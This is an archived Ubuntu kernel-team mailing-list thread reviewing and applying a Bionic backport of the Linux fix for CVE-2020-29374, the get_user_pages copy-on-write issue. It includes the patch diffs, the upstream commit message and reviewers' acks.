> > @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
> >  }
> >  
> >  /*
> > - * FOLL_FORCE can write to even unwritable pte's, but only
> > - * after we've gone through a COW cycle and they are dirty.
> > + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> > + * but only after we've gone through a COW cycle and they are dirty.
> >   */
> >  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
> >  {
> > - return pte_write(pte) ||
> > - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> > + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> > +}
> > +
> > +/*
> > + * A (separate) COW fault might break the page the other way and
> > + * get_user_pages() would return the page from what is now the wrong
> > + * VM. So we need to force a COW break at GUP time even for reads.
> > + */
> > +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> > +{
> > + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
> >  }
> >  
> >  static struct page *follow_page_pte(struct vm_area_struct *vma,
> > @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
> >   if (!vma || check_vma_flags(vma, gup_flags))
> >   return i ? : -EFAULT;
> >   if (is_vm_hugetlb_page(vma)) {
> > + if (should_force_cow_break(vma, foll_flags))
> > + foll_flags |= FOLL_WRITE;
> >   i = follow_hugetlb_page(mm, vma, pages, vmas,
> >   &start, &nr_pages, i,
> > - gup_flags, nonblocking);
> > + foll_flags, nonblocking);
> >   continue;
> >   }
> >   }
> > +
> > + if (should_force_cow_break(vma, foll_flags))
> > + foll_flags |= FOLL_WRITE;
> > +
> >  retry:
> >   /*
> >   * If we have a pending SIGKILL, don't keep faulting pages and
> > @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
> >  /*
> >   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
> >   * the regular GUP. It will only return non-negative values.
> > + *
> > + * Careful, careful! COW breaking can go either way, so a non-write
> > + * access can get ambiguous page results. If you call this function without
> > + * 'write' set, you'd better be sure that you're ok with that ambiguity.
> >   */
> >  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >    struct page **pages)
> > @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >   *
> >   * We do not adopt an rcu_read_lock(.) here as we also want to
> >   * block IPIs that come from THPs splitting.
> > + *
> > + * NOTE! We allow read-only gup_fast() here, but you'd better be
> > + * careful about possible COW pages. You'll get _a_ COW page, but
> > + * not necessarily the one you intended to get depending on what
> > + * COW event happens after this. COW may break the page copy in a
> > + * random direction.
> >   */
> >  
> >   if (gup_fast_permitted(start, nr_pages, write)) {
> > @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> >   (void __user *)start, len)))
> >   return -EFAULT;
> >  
> > + /*
> > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > + * because get_user_pages() may need to cause an early COW in
> > + * order to avoid confusing the normal COW routines. So only
> > + * targets that are already writable are safe to do by just
> > + * looking at the page tables.
> > + */
> >   if (gup_fast_permitted(start, nr_pages, write)) {
> >   local_irq_disable();
> > - gup_pgd_range(addr, end, write, pages, &nr);
> > + gup_pgd_range(addr, end, 1, pages, &nr);
> >   local_irq_enable();
> >   ret = nr;
> >   }
> > diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> > index b0a6ba0833e4..9f8fbb504d15 100644
> > --- a/mm/huge_memory.c
> > +++ b/mm/huge_memory.c
> > @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
> >  }
> >  
> >  /*
> > - * FOLL_FORCE can write to even unwritable pmd's, but only
> > - * after we've gone through a COW cycle and they are dirty.
> > + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> > + * but only after we've gone through a COW cycle and they are dirty.
> >   */
> >  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
> >  {
> > - return pmd_write(pmd) ||
> > -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> > + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
>
> The comment above this function mentions FOLL_FORCE, but I see it
> removed here. Is that removal intentional?

Yep, that comes from the upstream code.

Cascardo.

>
> William Breathitt Gray
>
> >  }
> >  
> >  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> > --
> > 2.27.0
> >
> >
> > --
> > kernel-team mailing list
> > [hidden email]
> > https://lists.ubuntu.com/mailman/listinfo/kernel-team



--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

ACK: [SRU Bionic 0/1] CVE-2020-29374

Kamal Mostafa-2
In reply to this post by Thadeu Lima de Souza Cascardo-3
LGTM.

Acked-by: Kamal Mostafa <[hidden email]>

 -Kamal

On Wed, Dec 16, 2020 at 10:25:56PM -0300, Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

ACK: [SRU Bionic 1/1] gup: document and work around "COW can break either way" issue

William Breathitt Gray
In reply to this post by Thadeu Lima de Souza Cascardo-3
On Thu, Jan 21, 2021 at 05:40:10PM -0300, Thadeu Lima de Souza Cascardo wrote:

> On Wed, Jan 13, 2021 at 05:54:06AM -0500, William Breathitt Gray wrote:
> > On Wed, Dec 16, 2020 at 10:25:57PM -0300, Thadeu Lima de Souza Cascardo wrote:
> > > From: Linus Torvalds <[hidden email]>
> > >
> > > Doing a "get_user_pages()" on a copy-on-write page for reading can be
> > > ambiguous: the page can be COW'ed at any time afterwards, and the
> > > direction of a COW event isn't defined.
> > >
> > > Yes, whoever writes to it will generally do the COW, but if the thread
> > > that did the get_user_pages() unmapped the page before the write (and
> > > that could happen due to memory pressure in addition to any outright
> > > action), the writer could also just take over the old page instead.
> > >
> > > End result: the get_user_pages() call might result in a page pointer
> > > that is no longer associated with the original VM, and is associated
> > > with - and controlled by - another VM having taken it over instead.
> > >
> > > So when doing a get_user_pages() on a COW mapping, the only really safe
> > > thing to do would be to break the COW when getting the page, even when
> > > only getting it for reading.
> > >
> > > At the same time, some users simply don't even care.
> > >
> > > For example, the perf code wants to look up the page not because it
> > > cares about the page, but because the code simply wants to look up the
> > > physical address of the access for informational purposes, and doesn't
> > > really care about races when a page might be unmapped and remapped
> > > elsewhere.
> > >
> > > This adds logic to force a COW event by setting FOLL_WRITE on any
> > > copy-on-write mapping when FOLL_GET (or FOLL_PIN) is used to get a page
> > > pointer as a result.
> > >
> > > The current semantics end up being:
> > >
> > >  - __get_user_pages_fast(): no change. If you don't ask for a write,
> > >    you won't break COW. You'd better know what you're doing.
> > >
> > >  - get_user_pages_fast(): the fast-case "look it up in the page tables
> > >    without anything getting mmap_sem" now refuses to follow a read-only
> > >    page, since it might need COW breaking.  Which happens in the slow
> > >    path - the fast path doesn't know if the memory might be COW or not.
> > >
> > >  - get_user_pages() (including the slow-path fallback for gup_fast()):
> > >    for a COW mapping, turn on FOLL_WRITE for FOLL_GET/FOLL_PIN, with
> > >    very similar semantics to FOLL_FORCE.
> > >
> > > If it turns out that we want finer granularity (ie "only break COW when
> > > it might actually matter" - things like the zero page are special and
> > > don't need to be broken) we might need to push these semantics deeper
> > > into the lookup fault path.  So if people care enough, it's possible
> > > that we might end up adding a new internal FOLL_BREAK_COW flag to go
> > > with the internal FOLL_COW flag we already have for tracking "I had a
> > > COW".
> > >
> > > Alternatively, if it turns out that different callers might want to
> > > explicitly control the forced COW break behavior, we might even want to
> > > make such a flag visible to the users of get_user_pages() instead of
> > > using the above default semantics.
> > >
> > > But for now, this is mostly commentary on the issue (this commit message
> > > being a lot bigger than the patch, and that patch in turn is almost all
> > > comments), with that minimal "enable COW breaking early" logic using the
> > > existing FOLL_WRITE behavior.
> > >
> > > [ It might be worth noting that we've always had this ambiguity, and it
> > >   could arguably be seen as a user-space issue.
> > >
> > >   You only get private COW mappings that could break either way in
> > >   situations where user space is doing cooperative things (ie fork()
> > >   before an execve() etc), but it _is_ surprising and very subtle, and
> > >   fork() is supposed to give you independent address spaces.
> > >
> > >   So let's treat this as a kernel issue and make the semantics of
> > >   get_user_pages() easier to understand. Note that obviously a true
> > >   shared mapping will still get a page that can change under us, so this
> > >   does _not_ mean that get_user_pages() somehow returns any "stable"
> > >   page ]
> > >
> > > Reported-by: Jann Horn <[hidden email]>
> > > Tested-by: Christoph Hellwig <[hidden email]>
> > > Acked-by: Oleg Nesterov <[hidden email]>
> > > Acked-by: Kirill Shutemov <[hidden email]>
> > > Acked-by: Jan Kara <[hidden email]>
> > > Cc: Andrea Arcangeli <[hidden email]>
> > > Cc: Matthew Wilcox <[hidden email]>
> > > Signed-off-by: Linus Torvalds <[hidden email]>
> > > (backported from commit 17839856fd588f4ab6b789f482ed3ffd7c403e1f)
> > > [cascardo: fixed conflict due to missing commit ad415db817964e96df824e8bb1a861527f8012b6]
> > > [cascardo: fixed conflict due to missing commit b798bec4741bdd80224214fdd004c8e52698e425]
> > > [cascardo: fixed minor conflict on __get_user_pages_fast comment]
> > > [cascardo: fixup for absence of FOLL_PIN]
> > > [cascardo: use write=1 on s390's get_user_pages_fast too]
> > > CVE-2020-29374
> > > Signed-off-by: Thadeu Lima de Souza Cascardo <[hidden email]>
> > > ---
> > >  arch/s390/mm/gup.c                      |  9 ++++-
> > >  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
> > >  mm/gup.c                                | 44 +++++++++++++++++++++----
> > >  mm/huge_memory.c                        |  7 ++--
> > >  4 files changed, 57 insertions(+), 11 deletions(-)
> > >
> > > diff --git a/arch/s390/mm/gup.c b/arch/s390/mm/gup.c
> > > index 9bce54eac0b0..713cf80a740e 100644
> > > --- a/arch/s390/mm/gup.c
> > > +++ b/arch/s390/mm/gup.c
> > > @@ -283,9 +283,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >  {
> > >   int nr, ret;
> > >  
> > > + /*
> > > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > > + * because get_user_pages() may need to cause an early COW in
> > > + * order to avoid confusing the normal COW routines. So only
> > > + * targets that are already writable are safe to do by just
> > > + * looking at the page tables.
> > > + */
> > >   might_sleep();
> > >   start &= PAGE_MASK;
> > > - nr = __get_user_pages_fast(start, nr_pages, write, pages);
> > > + nr = __get_user_pages_fast(start, nr_pages, 1, pages);
> > >   if (nr == nr_pages)
> > >   return nr;
> > >  
> > > diff --git a/drivers/gpu/drm/i915/i915_gem_userptr.c b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > index f1bd66b5f006..d87beef8ceb3 100644
> > > --- a/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > +++ b/drivers/gpu/drm/i915/i915_gem_userptr.c
> > > @@ -640,6 +640,14 @@ static int i915_gem_userptr_get_pages(struct drm_i915_gem_object *obj)
> > >        GFP_KERNEL |
> > >        __GFP_NORETRY |
> > >        __GFP_NOWARN);
> > > + /*
> > > + * Using __get_user_pages_fast() with a read-only
> > > + * access is questionable. A read-only page may be
> > > + * COW-broken, and then this might end up giving
> > > + * the wrong side of the COW..
> > > + *
> > > + * We may or may not care.
> > > + */
> > >   if (pvec) /* defer to worker if malloc fails */
> > >   pinned = __get_user_pages_fast(obj->userptr.ptr,
> > >         num_pages,
> > > diff --git a/mm/gup.c b/mm/gup.c
> > > index 12b9626b1a9e..ebf4a3482dee 100644
> > > --- a/mm/gup.c
> > > +++ b/mm/gup.c
> > > @@ -61,13 +61,22 @@ static int follow_pfn_pte(struct vm_area_struct *vma, unsigned long address,
> > >  }
> > >  
> > >  /*
> > > - * FOLL_FORCE can write to even unwritable pte's, but only
> > > - * after we've gone through a COW cycle and they are dirty.
> > > + * FOLL_FORCE or a forced COW break can write even to unwritable pte's,
> > > + * but only after we've gone through a COW cycle and they are dirty.
> > >   */
> > >  static inline bool can_follow_write_pte(pte_t pte, unsigned int flags)
> > >  {
> > > - return pte_write(pte) ||
> > > - ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pte_dirty(pte));
> > > + return pte_write(pte) || ((flags & FOLL_COW) && pte_dirty(pte));
> > > +}
> > > +
> > > +/*
> > > + * A (separate) COW fault might break the page the other way and
> > > + * get_user_pages() would return the page from what is now the wrong
> > > + * VM. So we need to force a COW break at GUP time even for reads.
> > > + */
> > > +static inline bool should_force_cow_break(struct vm_area_struct *vma, unsigned int flags)
> > > +{
> > > + return is_cow_mapping(vma->vm_flags) && (flags & (FOLL_GET));
> > >  }
> > >  
> > >  static struct page *follow_page_pte(struct vm_area_struct *vma,
> > > @@ -694,12 +703,18 @@ static long __get_user_pages(struct task_struct *tsk, struct mm_struct *mm,
> > >   if (!vma || check_vma_flags(vma, gup_flags))
> > >   return i ? : -EFAULT;
> > >   if (is_vm_hugetlb_page(vma)) {
> > > + if (should_force_cow_break(vma, foll_flags))
> > > + foll_flags |= FOLL_WRITE;
> > >   i = follow_hugetlb_page(mm, vma, pages, vmas,
> > >   &start, &nr_pages, i,
> > > - gup_flags, nonblocking);
> > > + foll_flags, nonblocking);
> > >   continue;
> > >   }
> > >   }
> > > +
> > > + if (should_force_cow_break(vma, foll_flags))
> > > + foll_flags |= FOLL_WRITE;
> > > +
> > >  retry:
> > >   /*
> > >   * If we have a pending SIGKILL, don't keep faulting pages and
> > > @@ -1796,6 +1811,10 @@ bool gup_fast_permitted(unsigned long start, int nr_pages, int write)
> > >  /*
> > >   * Like get_user_pages_fast() except it's IRQ-safe in that it won't fall back to
> > >   * the regular GUP. It will only return non-negative values.
> > > + *
> > > + * Careful, careful! COW breaking can go either way, so a non-write
> > > + * access can get ambiguous page results. If you call this function without
> > > + * 'write' set, you'd better be sure that you're ok with that ambiguity.
> > >   */
> > >  int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >    struct page **pages)
> > > @@ -1823,6 +1842,12 @@ int __get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >   *
> > >   * We do not adopt an rcu_read_lock(.) here as we also want to
> > >   * block IPIs that come from THPs splitting.
> > > + *
> > > + * NOTE! We allow read-only gup_fast() here, but you'd better be
> > > + * careful about possible COW pages. You'll get _a_ COW page, but
> > > + * not necessarily the one you intended to get depending on what
> > > + * COW event happens after this. COW may break the page copy in a
> > > + * random direction.
> > >   */
> > >  
> > >   if (gup_fast_permitted(start, nr_pages, write)) {
> > > @@ -1868,9 +1893,16 @@ int get_user_pages_fast(unsigned long start, int nr_pages, int write,
> > >   (void __user *)start, len)))
> > >   return -EFAULT;
> > >  
> > > + /*
> > > + * The FAST_GUP case requires FOLL_WRITE even for pure reads,
> > > + * because get_user_pages() may need to cause an early COW in
> > > + * order to avoid confusing the normal COW routines. So only
> > > + * targets that are already writable are safe to do by just
> > > + * looking at the page tables.
> > > + */
> > >   if (gup_fast_permitted(start, nr_pages, write)) {
> > >   local_irq_disable();
> > > - gup_pgd_range(addr, end, write, pages, &nr);
> > > + gup_pgd_range(addr, end, 1, pages, &nr);
> > >   local_irq_enable();
> > >   ret = nr;
> > >   }
> > > diff --git a/mm/huge_memory.c b/mm/huge_memory.c
> > > index b0a6ba0833e4..9f8fbb504d15 100644
> > > --- a/mm/huge_memory.c
> > > +++ b/mm/huge_memory.c
> > > @@ -1425,13 +1425,12 @@ int do_huge_pmd_wp_page(struct vm_fault *vmf, pmd_t orig_pmd)
> > >  }
> > >  
> > >  /*
> > > - * FOLL_FORCE can write to even unwritable pmd's, but only
> > > - * after we've gone through a COW cycle and they are dirty.
> > > + * FOLL_FORCE or a forced COW break can write even to unwritable pmd's,
> > > + * but only after we've gone through a COW cycle and they are dirty.
> > >   */
> > >  static inline bool can_follow_write_pmd(pmd_t pmd, unsigned int flags)
> > >  {
> > > - return pmd_write(pmd) ||
> > > -       ((flags & FOLL_FORCE) && (flags & FOLL_COW) && pmd_dirty(pmd));
> > > + return pmd_write(pmd) || ((flags & FOLL_COW) && pmd_dirty(pmd));
> >
> > The comment above this function mentions FOLL_FORCE, but I see it
> > removed here. Is that removal intentional?
>
> Yep, that comes from the upstream code.
>
> Cascardo.
You're right, the upstream patch removes this.

Acked-by: William Breathitt Gray <[hidden email]>

>
> >
> > William Breathitt Gray
> >
> > >  }
> > >  
> > >  struct page *follow_trans_huge_pmd(struct vm_area_struct *vma,
> > > --
> > > 2.27.0
> > >
> > >
> > > --
> > > kernel-team mailing list
> > > [hidden email]
> > > https://lists.ubuntu.com/mailman/listinfo/kernel-team
>
>

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team

APPLIED: [SRU Bionic 0/1] CVE-2020-29374

Kelsey Skunberg
In reply to this post by Thadeu Lima de Souza Cascardo-3
Applied to Bionic/master-next. Thank you!

-Kelsey

On 2020-12-16 22:25:56 , Thadeu Lima de Souza Cascardo wrote:

> [Impact]
> A child process can read CoW data from a parent. This is the first part of the
> writeup at https://bugs.chromium.org/p/project-zero/issues/detail?id=2045.
>
> [Test case]
> The code at the Project Zero writeup was the one tested. It was adapted so the
> shared data was read at the child before doing get_user_pages_fast, so the fast
> path would be taken and the fast path on s390x could be tested.
>
> [Backport]
> There were conflicts that were fixed, and FOLL_PIN does not exist on bionic.
> Also, s390x is the only architecture that matters to us that still had its own
> GUPF implementation at 4.15. So, it needed to carry a fix of its own based on
> the generic one.
>
> [Potential regression]
> This could break users of GUP and hugepages.
>
> Linus Torvalds (1):
>   gup: document and work around "COW can break either way" issue
>
>  arch/s390/mm/gup.c                      |  9 ++++-
>  drivers/gpu/drm/i915/i915_gem_userptr.c |  8 +++++
>  mm/gup.c                                | 44 +++++++++++++++++++++----
>  mm/huge_memory.c                        |  7 ++--
>  4 files changed, 57 insertions(+), 11 deletions(-)
>
> --
> 2.27.0
>
>
> --
> kernel-team mailing list
> [hidden email]
> https://lists.ubuntu.com/mailman/listinfo/kernel-team

--
kernel-team mailing list
[hidden email]
https://lists.ubuntu.com/mailman/listinfo/kernel-team